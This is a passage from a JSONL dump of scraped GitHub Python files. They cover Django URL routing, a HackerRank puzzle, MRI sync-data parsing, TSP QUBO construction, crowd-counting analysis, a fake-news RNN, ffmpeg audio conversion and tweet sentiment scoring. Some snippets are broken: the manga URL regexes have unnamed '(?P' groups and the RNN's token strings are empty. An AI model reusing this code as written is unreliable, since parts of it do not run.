name='goodbye'),\n)\n","repo_name":"cmltaWt0/django-ams","sub_path":"ams/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39136490773","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n#\n# Complete the 'formingMagicSquare' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts 2D_INTEGER_ARRAY s as parameter.\n#\n\ndef formingMagicSquare(s):\n possiblePermutations = [\n [[8, 1, 6], [3, 5, 7], [4, 9, 2]],\n [[6, 1, 8], [7, 5, 3], [2, 9, 4]],\n [[4, 9, 2], [3, 5, 7], [8, 1, 6]],\n [[2, 9, 4], [7, 5, 3], [6, 1, 8]],\n [[8, 3, 4], [1, 5, 9], [6, 7, 2]],\n [[4, 3, 8], [9, 5, 1], [2, 7, 6]],\n [[6, 7, 2], [1, 5, 9], [8, 3, 4]],\n [[2, 7, 6], [9, 5, 1], [4, 3, 8]]]\n\n minCost = 1000\n for i in range(8):\n permutationCost = 0\n for j in range(3):\n for k in range(3):\n permutationCost += abs(s[j][k] - possiblePermutations[i][j][k])\n minCost = min(minCost, permutationCost)\n return minCost\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n s = []\n\n for _ in range(3):\n s.append(list(map(int, input().rstrip().split())))\n\n result = formingMagicSquare(s)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"burcia1711/hackerrank","sub_path":"problem solving/algorithms/catsAndMouse.py","file_name":"catsAndMouse.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5174436555","text":"'''readSyncdata'''\n\nimport os\nfrom ctypes import c_uint32\n\nimport numpy as np\n\nfrom mr_utils.load_data.s2i import sScanHeader, sMDH\n\ndef readSyncdata(siemens_dat, VBFILE, acquisitions, dma_length,\n scanheader, header, last_scan_counter):\n\n if VBFILE:\n len = dma_length - sMDH.itemsize\n\n # Is VB magic? 
For now let's assume it's not, and that this\n # is just Siemens secret sauce.\n siemens_dat.seek(len, os.SEEK_CUR)\n # return std::vector();\n return None\n else:\n raise NotImplementedError()\n\n len = dma_length - sScanHeader.itemsize\n\n # siemens_dat.seekg(len,siemens_dat.cur)\n # return std::vector()\n cur_pos = siemens_dat.tell()\n packetSize = np.fromfile(\n siemens_dat, dtype=c_uint32, count=1)\n\n packedID = siemens_dat.read(52)\n\n # packedID indicates this isn't PMU data, so let's jump ship\n if 'PMU' not in packedID:\n siemens_dat.seek(cur_pos)\n siemens_dat.seek(len, os.SEEK_CUR)\n # return std::vector();\n return None\n\n learning_phase = 'PMULearnPhase' in packedID\n\n (swappedFlag, timestamp0, timestamp, packerNr,\n duration) = np.fromfile(siemens_dat, dtype=c_uint32, count=5)\n\n # magic = PMU_Type_inverse[np.fromfile(\n # siemens_dat, dtype=c_uint32, count=1)[0]]\n\n# # Read in all the PMU data first, to figure out if we have\n# # multiple ECGs.\n# std::map, uint32_t >> pmu_map;\n# std::set ecg_types = {PMU_Type::ECG1, PMU_Type::ECG2, PMU_Type::ECG3, PMU_Type::ECG4};\n# std::map, uint32_t >> ecg_map;\n# while (magic != PMU_Type::END) {\n# //Read and store period\n# uint32_t period;\n#\n# siemens_dat.read((char *) &period, sizeof(uint32_t));\n#\n# //Allocate and read data\n# std::vector data(duration / period);\n# siemens_dat.read((char *) data.data(), data.size() * sizeof(PMUdata));\n# //Split into ECG and PMU sets.\n# if (ecg_types.count(magic)) {\n# ecg_map[magic] = std::make_tuple(std::move(data), period);\n# } else {\n# pmu_map[magic] = std::make_tuple(std::move(data), period);\n# }\n# //Read next tag\n# siemens_dat.read((char *) &magic, sizeof(uint32_t));\n# if (!PMU_Types.count(magic))\n# throw std::runtime_error(\"Malformed file\");\n#\n#\n# }\n#\n# //Have to handle ECG seperately.\n#\n# std::vector waveforms;\n# waveforms.reserve(5);\n# if (ecg_map.size() > 0 || pmu_map.size() > 0) {\n#\n# if (ecg_map.size() > 0) {\n#\n# size_t channels = ecg_map.size();\n# size_t number_of_elements = std::get<0>(ecg_map.begin()->second).size();\n#\n# auto ecg_waveform = ISMRMRD::Waveform(number_of_elements, channels + 1);\n# ecg_waveform.head.waveform_id = waveformId.at(PMU_Type::ECG1) + 5 * learning_phase;\n#\n# uint32_t *ecg_waveform_data = ecg_waveform.data;\n#\n# uint32_t *trigger_data = ecg_waveform_data + number_of_elements * channels;\n# std::fill(trigger_data, trigger_data + number_of_elements, 0);\n# //Copy in the data\n# for (auto key_val : ecg_map) {\n# auto tup = unpack_pmu(std::get<0>(key_val.second));\n# auto &data = std::get<0>(tup);\n# auto &trigger = std::get<1>(tup);\n#\n# std::copy(data.begin(), data.end(), ecg_waveform_data);\n# ecg_waveform_data += data.size();\n#\n# for (auto i = 0; i < number_of_elements; i++) trigger_data[i] |= trigger[i];\n#\n# }\n#\n# // ecg_waveform.head.sample_time_us = sample_time_us.at(PMU_Type::ECG1);\n# waveforms.push_back(std::move(ecg_waveform));\n#\n#\n# }\n#\n#\n# for (auto key_val : pmu_map) {\n# auto tup = unpack_pmu(std::get<0>(key_val.second));\n# auto &data = std::get<0>(tup);\n# auto &trigger = std::get<1>(tup);\n#\n# auto waveform = ISMRMRD::Waveform(data.size(), 2);\n# waveform.head.waveform_id = waveformId.at(key_val.first) + 5 * learning_phase;\n# std::copy(data.begin(), data.end(), waveform.data);\n#\n# std::copy(trigger.begin(), trigger.end(), waveform.data + data.size());\n#\n# # waveform.head.sample_time_us = sample_time_us.at(key_val.first)\n# waveforms.push_back(std::move(waveform))\n# }\n# # Figure out number 
of ECG channels\n#\n#\n# for waveform in waveforms:\n# waveform['head']['time_stamp'] = timestamp\n# waveform['head']['measurement_uid'] = scanheader['lMeasUID']\n# waveform['head']['scan_counter'] = last_scan_counter\n# waveform['head']['sample_time_us'] = duration*100/waveform['head']['number_of_samples']\n#\n# if waveforms:\n# makeWaveformHeader(header) # Add the header if needed\n#\n# siemens_dat.seek(cur_pos)\n# siemens_dat.seek(len, os.CUR)\n# return waveforms\n","repo_name":"mckib2/mr_utils","sub_path":"mr_utils/load_data/s2i/read_sync_data.py","file_name":"read_sync_data.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"}
{"seq_id":"18328700487","text":"import ast\nimport os\n\nimport pandas as pd\nfrom collections import Counter\nfrom sklearn.preprocessing import MultiLabelBinarizer\n\nN = 10  # the number of most popular labels to keep\n\ndata = pd.read_csv(\"arxiv_data.csv\")\ndata[\"terms\"] = data[\"terms\"].apply(ast.literal_eval)\n\ntransformer = MultiLabelBinarizer(sparse_output=True)\ntransformer.fit(data[\"terms\"])\nK = len(transformer.classes_)\nprint(\"The original dataset has {} unique labels\".format(K))\n\ncounter = Counter()\nfor labels in data[\"terms\"]:\n    counter.update(labels)\nmin_count = counter.most_common(N)[-1][1]  # frequency of the N-th most popular label\n\n\ndef filter_labels(labels):\n    # keep only the labels at least as frequent as the N-th most popular one\n    labels = [label for label in labels if counter[label] >= min_count]\n    return labels\n\n\ndata[\"terms\"] = data[\"terms\"].apply(filter_labels)\ndata[\"titles\"] = data[\"titles\"].apply(lambda x: x.replace(\"\\n\", \" \"))\ndata[\"summaries\"] = data[\"summaries\"].apply(lambda x: x.replace(\"\\n\", \" \"))\n\n# Create the folder if it does not already exist, then save the dataset\nif not os.path.exists(\"data\"):\n    os.mkdir(\"data\")\ndata.to_csv(\"./data/arxiv_abstract.csv\", index=False)\n","repo_name":"Azure/azureml-examples","sub_path":"sdk/python/jobs/automl-standalone-jobs/automl-nlp-text-classification-multilabel-task-paper-categorization/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":1362,"dataset":"github-code","pt":"37"}
{"seq_id":"20698030973","text":"import abstract as ab\nimport os\nimport pathlib as pl\n\n# create text files from the pdfs\nclass play:\n    def start():\n        path = os.getcwd()+'\\\\file\\\\'\n        pdf_fileList = [str(i) for i in pl.Path(path).glob(\"*.pdf\")]\n        text_fileList = [str(i) for i in pl.Path(path).glob(\"*.txt\")]\n        for i in pdf_fileList:\n            # skip pdfs that already have a matching text file\n            if i.replace('.pdf', '.txt') in text_fileList:\n                continue\n            else:\n                read_text = ab.pdfcontroll.pdf_conv_text(i)\n                ab.filecontroll.text_create(i,read_text)\n\n\n        # read the text files back in\n        text_fileList = [str(i) for i in pl.Path(path).glob(\"*.txt\")]\n        textlist = []\n        for i in text_fileList:\n            textlist.append([i.split('\\\\')[-1].split('.')[0],ab.filecontroll.read_text(i)])\n        \n        return textlist\n\n","repo_name":"vkdlxld7777/project4","sub_path":"project4.py","file_name":"project4.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"6066916191","text":"#!
/usr/bin/python\n\nimport os\nimport json\n\n\nclass AuthHandler():\n    '''Stores hostmask and permission group info for usernames, writes the data\n    to a json config file'''\n\n    def __init__(self, filename):\n        self.filename = filename\n        self.config = {}\n        self._load_config()\n\n    def add_user(self, username, hostmask, group):\n        username = username.lower()\n        group = group.lower()\n\n        self.config[username] = {'groups' : [group],\n                                 'hostmasks': [hostmask]\n                                }\n        self._save_config()\n    \n    def add_user_group(self, username, group):\n        self.config[username]['groups'].append(group)\n        self._save_config()\n    \n    def add_user_hostmask(self, username, hostmask):\n        username = username.lower()\n        self.config[username]['hostmasks'].append(hostmask)\n        self._save_config()\n\n    def get_group_list(self):\n        groupList = []\n        for user in self.config:\n            # only collect groups that have not been seen yet\n            groupList.extend([i for i in self.config[user]['groups'] if i not in groupList])\n        return groupList\n\n    def get_user_permissions(self, username, hostmask):\n        username = username.lower()\n        knownHostmasks = self.config.get(username, {}).get('hostmasks', [])\n        if hostmask in knownHostmasks:\n            return self.config.get(username).get('groups')\n        else:\n            return None\n\n    def remove_group(self, user, groupName):\n        if user in self.config:\n            if groupName in self.config[user]['groups']:\n                self.config[user]['groups'].remove(groupName)\n                self._save_config()\n    \n    def remove_user(self, username):\n        username = username.lower()\n        try:\n            self.config.pop(username)\n            self._save_config()\n        except KeyError:\n            return False\n\n    def remove_user_hostmask(self, username, hostmask):\n        username = username.lower()\n        try:\n            self.config[username]['hostmasks'].remove(hostmask)\n            self._save_config()\n        except KeyError:\n            return False\n    \n    def _load_config(self):\n        try:\n            if os.path.isfile(self.filename):\n                self.config = json.load(open(self.filename))\n\n        except ValueError:\n            self.config = {}\n\n    def _save_config(self):\n        f = open(self.filename, 'w')\n        f.write(json.dumps(self.config, indent = 4))\n        f.close()\n\n\n    \n\n\n\n\n","repo_name":"forty-two/WikIRC","sub_path":"permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"6066916191","text":"import itertools\nimport numpy as np\nimport random\nfrom math import radians, sin, cos, sqrt, atan2\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider\nfrom matplotlib.animation import FuncAnimation\nfrom functools import partial\nfrom sympy import *\nimport os\nimport scipy.io as sio\n# import dimod\n# import neal\n\n# Function to calculate distance between two cities using Haversine formula\ndef calculateDistance(city1, city2):\n    # Earth radius in meters\n    R = 6371000\n\n    # Convert latitude and longitude to radians\n    lat1, lon1 = map(radians, city1)\n    lat2, lon2 = map(radians, city2)\n\n    # Haversine formula\n    dlat = lat2 - lat1\n    dlon = lon2 - lon1\n    a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n    c = 2 * atan2(sqrt(a), sqrt(1 - a))\n    distance = R * c\n\n    return distance\n\ndef get_distance_matrix(cityCoordinates):\n    N = int(len(cityCoordinates)) #numNodes\n\n    # Calculate distance matrix\n    distanceMatrix = [[0] * N for _ in range(N)]\n    for i in range(N):\n        for j in range(N):\n            distanceMatrix[i][j] = calculateDistance(cityCoordinates[i], cityCoordinates[j])\n    print(\"Distance matrix calculated\")\n\n    return distanceMatrix\n\ndef get_obective_fct(cityNames, distanceMatrix, N, X):\n    # Define
objective function\n obj = 0\n\n print(N)\n # Iterate over each element of the symbolic matrix\n for i in range(N):\n for j in range(N):\n for p in range(N-1):\n obj = obj + distanceMatrix[i][j]*X[i,p]*X[j,p+1]\n\n obj = obj + distanceMatrix[i][j]*X[i,0]*X[j,N-1]\n\n return obj\n\ndef get_Q(X, N, distanceMatrix, obj, enforce_start_city, start_city, elements):\n # Add all symbolic elements of each row together\n row_sums = [sum(X.row(i)) for i in range(N)]\n col_sums = [sum(X.col(i)) for i in range(N)]\n\n # Construct a new symbolic matrix from the row sums\n C1 = (Matrix(row_sums) - Matrix(np.ones(N))).T.multiply((Matrix(row_sums) - Matrix(np.ones(N))))\n C2 = (Matrix(col_sums) - Matrix(np.ones(N))).T.multiply((Matrix(col_sums) - Matrix(np.ones(N))))\n\n # Scale to maximum coeff + 1\n Penalty = np.max(distanceMatrix) + 1\n\n # Construct the objective function\n obj_comb = Matrix([obj]) + Penalty*(C1.row(0) + C2.row(0) + enforce_start_city*Matrix([pow(X[start_city,0]-1,2)]))\n\n # Compute the quadratic terms using the Hessian matrix\n hess = hessian(obj_comb, elements)/2\n\n # Compute the linear terms based on binary variable constraint\n gradient = lambda f, v: Matrix([f]).jacobian(v)\n grad = gradient(obj_comb, elements)\n b = np.array([row.as_coefficients_dict()[1] for row in grad])\n diag_m_b = np.diag(b)\n Q = hess + diag_m_b\n Q = np.array(Q.tolist(), dtype=float)\n\n return Q\n\ndef matrix_to_dict(matrix):\n dictionary = {}\n rows, columns = matrix.shape\n\n for i in range(rows):\n for j in range(columns):\n key = (i, j)\n value = matrix[i, j]\n dictionary[key] = value\n\n return dictionary\n\ndef dict_to_mat(dictionary):\n # Extract the keys and values from the dictionary\n keys = list(dictionary.keys())\n values = list(dictionary.values())\n\n # Determine the matrix dimensions based on the keys\n num_rows = max([key[0] for key in keys]) + 1\n num_cols = max([key[1] for key in keys]) + 1\n\n # Create the NumPy matrix\n matrix = np.zeros((num_rows, num_cols))\n\n # Fill the matrix with the values from the dictionary\n for key, value in zip(keys, values):\n matrix[key] = value\n\n return matrix\n\ndef dict_to_vect(dictionary):\n # Extract the keys and values from the dictionary\n keys = list(dictionary.keys())\n values = list(dictionary.values())\n\n # Determine the matrix dimensions based on the keys\n num_rows = len(values)\n\n # Create the NumPy matrix\n matrix = np.zeros(num_rows)\n\n # Fill the matrix with the values from the dictionary\n for key, value in zip(keys, values):\n matrix[key] = value\n\n return matrix\n\n# Map the state vector back to the city index in a schedule vector\ndef parse_op_vec_tsp(sample, N):\n dim = N\n m = np.empty([dim, dim])\n sch = np.empty([dim])\n for i in range(dim):\n for j in range(dim):\n m[i, j] = sample[j + i * dim]\n if m[i, j] == 1:\n sch[j] = i\n return m, sch.astype(int)\n\ndef get_distance(distanceMatrix, sch, N):\n distance = 0\n for p in range(N-1):\n length = distanceMatrix[sch[p]][sch[p+1]]\n distance = distance + length\n length = distanceMatrix[sch[N-1]][sch[0]]\n distance = distance + length; \n return distance\n","repo_name":"neuromorphs/NeuroP","sub_path":"examples/tsp_demo/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"73099757171","text":"import h5py\nimport scipy.io as io\nimport PIL.Image as Image\nimport numpy as np\nimport os\nimport glob\nfrom matplotlib import pyplot as plt\nfrom 
scipy.ndimage.filters import gaussian_filter\nimport scipy.spatial\nimport scipy\nimport cv2\nfrom matplotlib import cm as CM\nimport random\nimport torchvision\nimport sys\nfrom saver.checkpoints1_local_try0.net1_local_temp import net1_local\nimport torch\nimport torchvision.transforms.functional as F\nfrom data.single_image_loader2 import SingleImageDataset\nfrom torchvision import datasets, transforms\n\n\ndef get_one_image(img_path):  # return the image from the dataset\n    img_path = os.path.join(img_path)\n    img = Image.open(img_path).convert('RGB')\n    img = img.resize((1024, 1024), Image.ANTIALIAS)\n    return img\n\n\ndef get_one_gt(gt_path):  # images and gts in the dataset have the same size; resize the gt to 128x128 to stay consistent with dataloader1_temp\n    gt_file = h5py.File(gt_path, 'r')\n    gt_density_map = np.asarray(gt_file['density'])\n\n    original_gt_sum = np.sum(gt_density_map)\n    gt_density_map = cv2.resize(gt_density_map, (128, 128), interpolation=cv2.INTER_CUBIC)\n    current_gt_sum = np.sum(gt_density_map)\n    gt_density_map = gt_density_map * (original_gt_sum / current_gt_sum)\n\n    return gt_density_map\n\n\n# get the crowd distribution map produced by the 0-1 task of task one, and the final density map\ndef get_images(img_path, gt_path, checkpoint_save_dir, checkpoint_name, train_gpu_id, test_gpu_id, transform=None):\n    device = torch.device(test_gpu_id if torch.cuda.is_available() else 'cpu')\n    if train_gpu_id != test_gpu_id:\n        checkpoint = torch.load(os.path.join(checkpoint_save_dir, checkpoint_name), map_location={train_gpu_id:test_gpu_id})\n    else:\n        checkpoint = torch.load(os.path.join(checkpoint_save_dir, checkpoint_name))\n\n    net = net1_local()\n    net.load_state_dict(checkpoint['state_dict'])\n    net.to(device)\n    net.eval()\n\n    dataset = SingleImageDataset(img_path=img_path,\n                                 gt_path=gt_path,\n                                 transform=transforms.Compose([\n                                     transforms.ToTensor(),\n                                     transforms.Normalize(mean=[0.485, 0.456, 0.406],\n                                                          std=[0.229, 0.224, 0.225])\n                                 ]),\n                                 )\n    data_loader = torch.utils.data.DataLoader(dataset, shuffle=False, batch_size=1, num_workers=1)\n\n    for i, data in enumerate(data_loader, 0):\n        image, gt_density_map = data\n        image = image.to(device)\n        predict_density_map, predict_value, predict_cam64_image = net(image)  # respectively: the density map predicted by task two, the person/no-person value predicted by task one, and the cam64 map of task one\n\n        # predict_data = predict.data.squeeze()\n        # image = image.data.squeeze()\n        # gt = gt.data.squeeze()\n        # print('1', predict_data.shape)\n\n        return predict_density_map.data.squeeze(), predict_cam64_image.data.squeeze()\n\n\ndef convert_one_img_path_2_gt_path(img_path):\n    return img_path.replace('.jpg', '.h5').replace('image', 'gt')\n\n\ndef show_images(img_path, checkpoint_save_dir, checkpoint_name, train_gpu_id, test_gpu_id, transform=None):\n    gt_path = convert_one_img_path_2_gt_path(img_path)\n    img = get_one_image(img_path)\n    gt = get_one_gt(gt_path)\n\n    density_map, cam64_img = get_images(img_path, gt_path, checkpoint_save_dir, checkpoint_name, train_gpu_id, test_gpu_id, transform=None)\n\n    plt.figure(figsize=(50, 50))\n\n    plt.subplot(3, 3, 1)\n    plt.title('img')\n    plt.imshow(img)\n\n    plt.subplot(3, 3, 2)\n    plt.title('gt')\n    plt.imshow(gt)\n\n    plt.subplot(3, 3, 3)\n    plt.title('cam64_0')\n    plt.imshow(cam64_img[0])\n\n    plt.subplot(3, 3, 4)\n    plt.title('cam64_1')\n    plt.imshow(cam64_img[1])\n\n    plt.subplot(3, 3, 5)\n    plt.title('cam64_add')\n    plt.imshow(cam64_img[1] - cam64_img[0])\n\n    plt.subplot(3, 3, 6)\n    plt.title('density map')\n    plt.imshow(density_map)\n\n    plt.show()\n    plt.close()\n\n\nif __name__ == '__main__':\n    dataset = 'A'\n    test_img_dir = '/home/rainkeeper/Projects/Datasets/shanghaiTech/processed_CSRNet_uncrop_data_gpu0/part_' +
dataset + '/test_image'\n\n    test_img_name = 'IMG_110.jpg'\n\n    checkpoint_save_dir = '/home/rainkeeper/Projects/PycharmProjects/rain4/saver/checkpoints1_local_try0/'\n    checkpoint_name = 'Dataset_A108_69.4_90.03checkpoint.pth.tar'\n\n    train_gpu_id = 'cuda:0'  # which gpu the checkpoint was generated on\n    test_gpu_id = 'cuda:0'  # gpu id used for the current analysis task\n\n    test_img_path = os.path.join(test_img_dir, test_img_name)\n    show_images(test_img_path, checkpoint_save_dir, checkpoint_name, train_gpu_id, test_gpu_id, transform=None)\n","repo_name":"imrainkeeper/FMGNet","sub_path":"analysis/analysis_net0_local.py","file_name":"analysis_net0_local.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"8321445451","text":"\"\"\"manga URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import:  from my_app import views\n    2. Add a URL to urlpatterns:  path('', views.home, name='home')\nClass-based views\n    1. Add an import:  from other_app.views import Home\n    2. Add a URL to urlpatterns:  path('', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.urls import include, path\n    2. Add a URL to urlpatterns:  path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.urls import path, re_path\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nimport manga.views as views\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    re_path('manga/(?P.*/)(?P.*.zip)', views.mangaView, name='mangaView'),\n    re_path('manga/(?P.*/)(?P.*.cbz)', views.mangaView, name='mangaView'),\n    re_path('manga/(?P.*/)(?P.*.rar)', views.mangaView, name='mangaView'),\n    re_path('manga/(?P.*/)(?P.*.cbr)', views.mangaView, name='mangaView'),\n    re_path('manga/(?P.*/)(?P.*.pdf)', views.fileView, name='fileView'),\n    re_path('manga/(?P.*/)(?P.*.txt)', views.fileView, name='fileView'),\n    re_path('manga/(?P.*)', views.index, name='index'),\n    re_path('search/.*', views.search, name='index'),\n    re_path('unwatch/(?P.*)', views.unwatch),\n    re_path('watch/(?P.*)', views.watch),\n    path('', views.home, name='home'),\n]\n\nurlpatterns += staticfiles_urlpatterns()\n","repo_name":"jkflw/manga-server","sub_path":"manga/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"34251490630","text":"from NLPLib.DSP import RNNDataset, PadSequence\nfrom NLPLib.network import FakeNewsClassifier\nfrom tqdm import tqdm\nimport numpy as np\nimport argparse\nfrom terminaltables import AsciiTable\n\n\nfrom torch.nn.utils import clip_grad_norm_\nfrom torch.utils.data import DataLoader\nfrom torch import optim, nn\nimport torch\n\n# The special symbols to be added at the end of strings\nSTART_SYMBOL = ''\nEND_SYMBOL = ''\n\nPADDING_WORD = ''\nUNKNOWN_WORD = ''\n\n\nif __name__ == \"__main__\":\n    \n    #Args =============================================\n    parser = argparse.ArgumentParser(description='')\n    parser.add_argument('-ef', '--embeddings', default='', help='A file with word embeddings')\n    parser.add_argument('-bs', '--batch_size', type=int, default=250, help='Batch size')\n    parser.add_argument('-e', '--epochs', type=int, default=10, help='Number of epochs')\n    parser.add_argument('-lr',
'--learning_rate', type=float, default=0.01, help='Learning rate')\n \n args = parser.parse_args()\n \n \n is_cuda_available = torch.cuda.is_available()\n print(\"Is CUDA available? {}\".format(is_cuda_available))\n if is_cuda_available:\n print(\"Current device: {}\".format(torch.cuda.get_device_name(0)))\n else:\n print('Running on CPU')\n print()\n\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n \n # Preparing datasets ==============================\n dataset = RNNDataset(lenSequence=100)\n training_loader = DataLoader(dataset, args.batch_size, collate_fn=PadSequence())\n \n \n # Prepare network training ========================\n network = FakeNewsClassifier(\"glove.6B.50d.txt\", device=device, hidden_size=128)\n \n criterion = nn.BCELoss()\n optimizer = optim.Adam(network.parameters(), lr=args.learning_rate)\n \n network.train()\n \n for epoch in range( args.epochs ):\n lossAverage = 0\n for samples, labels in tqdm(training_loader, desc=\"Epoch {}\".format(epoch + 1)):\n \n \n optimizer.zero_grad()\n \n logits = network(samples)\n logits_shape = logits.shape\n \n loss = criterion(logits[:,0], torch.tensor(labels, dtype=torch.float).to(device))\n loss.backward()\n \n lossAverage += loss.item()\n \n clip_grad_norm_(network.parameters(), 5)\n optimizer.step()\n \n print(f\"Epoch average loss: {lossAverage / len(training_loader)}\")\n \n # Evaluation\n network.eval()\n confusion_matrix = [[0, 0],\n [0, 0]]\n\n dataset.setTraning = False\n testing_loader = DataLoader(dataset, args.batch_size, collate_fn=PadSequence())\n \n for x, y in tqdm(testing_loader, desc=\"Testing set\"):\n result = network(x)\n pred = torch.round(result).cpu().detach().numpy().reshape(-1,)\n y = np.array(y)\n\n tp = np.sum(pred[y == 1])\n tn = np.sum(1 - pred[y == 0])\n fp = np.sum(1 - y[pred == 1])\n fn = np.sum(y[pred == 0])\n\n confusion_matrix[0][0] += tn\n confusion_matrix[1][1] += tp\n confusion_matrix[0][1] += fp\n confusion_matrix[1][0] += fn\n\n table = [['', 'Predicted Fake', 'Predicted True'],\n ['Real Fake', confusion_matrix[0][0], confusion_matrix[0][1]],\n ['Real True', confusion_matrix[1][0], confusion_matrix[1][1]]]\n\n t = AsciiTable(table)\n print(t.table)\n print(\"Accuracy: {}\".format(\n round((confusion_matrix[0][0] + confusion_matrix[1][1]) / np.sum(confusion_matrix), 4))\n )\n","repo_name":"Fake-News-Detection-Project/Fake-News-Detection","sub_path":"true_fake_rnn.py","file_name":"true_fake_rnn.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5209513492","text":"import pathlib\nimport os\nimport tempfile\n\nimport ffmpeg\n\n\nclass AudioPreProcessor:\n def __init__(self):\n self.tmpdir = None\n self.output_path = None\n self.error = None\n\n def process(self, audio_file):\n # create a new temp dir for every run\n self.tmpdir = pathlib.Path(tempfile.mkdtemp())\n self.output_path = str(self.tmpdir / 'audio.wav')\n self.error = None\n\n # converts audio file to 16kHz 16bit mono wav...\n print('pre-processing audio file...')\n stream = ffmpeg.input(audio_file, vn=None, hide_banner=None)\n stream = stream.output(self.output_path, format='wav',\n acodec='pcm_s16le', ac=1, ar='16k').overwrite_output()\n try:\n ffmpeg.run(stream, capture_stdout=True, capture_stderr=True)\n except ffmpeg.Error as e:\n self.error = e.stderr.decode('utf8')\n\n def cleanup(self):\n if os.path.exists(self.output_path):\n os.remove(self.output_path)\n if self.tmpdir:\n 
self.tmpdir.rmdir()\n","repo_name":"meronym/speaker-transcription","sub_path":"lib/audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"21"} +{"seq_id":"17402016673","text":"'''\r\nthe function of this program is to separate each list of tweets into their regions and bodies\r\nthe function then takes each region and body and calculates the sentiment score of each tweet, and\r\nfinally adds up all of the scores and finds the average happiness score for each region\r\n'''\r\nimport string\r\n#given coordinate values for latitude and longitude\r\np1 = (49.189787, -67.444574)\r\np2 = (24.660845, -67.444574)\r\np3 = (49.189787, -87.518395)\r\np4 = (24.660845, -87.518395)\r\np5 = (49.189787, -101.998892)\r\np6 = (24.660845, -101.998892)\r\np7 = (49.189787, -115.236428)\r\np8 = (24.660845, -115.236428)\r\np9 = (49.189787, -125.242264)\r\np10 = (24.660845, -125.242264)\r\n\r\n#function checks to see if each latitude and longitude are within the specified regions\r\ndef TimeZone(latLongList):\r\n if latLongList[0] > p1[0] or latLongList[0] < p2[0] or latLongList[1] > p1[1] or latLongList[1] < p9[1]:\r\n zone = \"Not within any timezone\"\r\n elif latLongList[1] <= p1[1] and latLongList[1] >= p3[1]:\r\n zone = \"Eastern\"\r\n elif latLongList[1] < p3[1] and latLongList[1] >= p5[1]:\r\n zone = \"Central\"\r\n elif latLongList[1] < p5[1] and latLongList[1] >= p7[1]:\r\n zone = \"Mountain\"\r\n else:\r\n zone = \"Pacific\"\r\n return zone\r\n\r\n#function splits each tweet into its latitude and longitude as well as the body of the tweet\r\ndef ChangedTweet(tweet):\r\n tweetSplit = tweet.split()\r\n tweetLatLong = (tweetSplit)[0:2]\r\n tweetText = (tweetSplit)[5:]\r\n #removes the punctuation from the latitude and longitude and puts it into a list\r\n newLatLong = [tweetLatLong[0].strip(\"[],\"), tweetLatLong[1].strip(\"[],\")]\r\n return newLatLong, tweetText\r\n\r\n#function computes each tweet and calculates the happiness scores, keyword tweets, and total tweets for each region\r\ndef compute_tweets(tweets, keywords):\r\n try:\r\n #open and read each file\r\n tweetsFile = open(tweets, \"r\" , encoding=\"utf-8\")\r\n keywordsFile = open(keywords, \"r\" , encoding=\"utf-8\")\r\n #read the current tweet\r\n tweetCurrent = tweetsFile.readline()\r\n\r\n #values for calculations\r\n totalEast = 0\r\n totalCentral = 0\r\n totalMountain = 0\r\n totalPacific = 0\r\n\r\n hapScoreEast = 0\r\n hapScoreCentral = 0\r\n hapScoreMountain = 0\r\n hapScorePacific = 0\r\n\r\n keywordTweetsEast = 0\r\n keywordTweetsCentral = 0\r\n keywordTweetsMountain = 0\r\n keywordTweetsPacific = 0\r\n\r\n tweetsEast = 0\r\n tweetsCentral = 0\r\n tweetsMountain = 0\r\n tweetsPacific = 0\r\n\r\n keywordsList = []\r\n #creates a list for keywords and splits the file into keywords and their sentiment values\r\n for keywordsRow in keywordsFile:\r\n splitKeywords = keywordsRow.split(\",\")\r\n keywordsList.append(splitKeywords)\r\n\r\n #while the current tweet is not empty\r\n while tweetCurrent != \"\":\r\n #create a list for latitude and longitude by converting its values into floats and adding them to the list\r\n LatLongList = []\r\n for tweet in ChangedTweet(tweetCurrent)[0]:\r\n LatLongList.append(float(tweet))\r\n tweetText = ChangedTweet(tweetCurrent)[1]\r\n #if the timezone is Eastern, add one for the region and if the current word is a keyword, add it to the total\r\n if 